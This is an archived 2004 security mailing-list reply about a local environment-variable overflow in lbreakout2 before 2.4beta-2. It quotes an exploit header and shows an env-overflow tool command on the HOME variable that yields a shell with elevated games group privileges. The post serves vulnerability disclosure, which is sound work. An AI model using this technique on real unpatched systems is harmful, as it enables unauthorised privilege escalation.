Re: lbreakout2 < 2.4beta-2 local exploit

From: Steve Kemp (
Date: 02/23/04

  • Next message: Shaun Colley: "3Com DSL Router Long Request DoS exploit."
    Date: Mon, 23 Feb 2004 20:26:03 +0000

    On Sun, Feb 22, 2004 at 01:45:45PM -0000, wrote:

    > /*
    > * lbreakout2 < 2.4beta-2 local exploit by
    > * vulnerability reported by Ulf Harnhammar <>
    > * usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]]
    > *
    > */

        I much prefer mine ;)

        Using the `env-overflow` tool this may be exploited without
       the need for a valid X11 display - ie. ssh/telnet access
       sufficient - or any explicit coding:

       skx@uml:~$ ./env-overflow /usr/games/lbreakout2 1084 HOME
       ... snip ...
       sh-2.05a$ id
       uid=1000(skx) gid=100(users) egid=60(games) groups=100(users)

       Where env-overflow lives here:



    # Debian Security Audit Project

  • Next message: Shaun Colley: "3Com DSL Router Long Request DoS exploit."

    Relevant Pages

    • Re: Problems with staying in tune!
      ... > <snip to save bandwidth> ... > Steve, you don't want to see the truth in the time line of both artists. ... Speaks volumes about your attitude. ... With these players, ...
    • Re: Now online - The Kombat Kramer Photo Album!
      ... >> Will you be coming back over the weekend to dance some more for me ... Stop it Steve!!! ... expert swordsman, expert deep sea diver, martial arts expert, Vietnam combat ... > <snip obsessive crap> ...
    • Re: Questions to the list
      ... On Jun 1, 2007, at 11:19 AM, Thompson, Steve wrote: ... support questions to their user group web site, ...
    • Re: Hi, i have a problem with ODE45
      ... > "Steven Lord" wrote in message ... Steve Lord ... I'd like to mention that i'm solving vehicle structural impact, in which the acceleration of the lumped masses is dependent on the structural force which in turn depending on a comparison of the structural deflection with the previous value. ...
    • Re: novice licence - its not happening for me
      ... <SNIP> ... exclusively black-box operators that you are bringing into the hobby. ... Works in computing, age mid-twenties. ... Steve, I'm not sure that you have much idea about who is joining the ...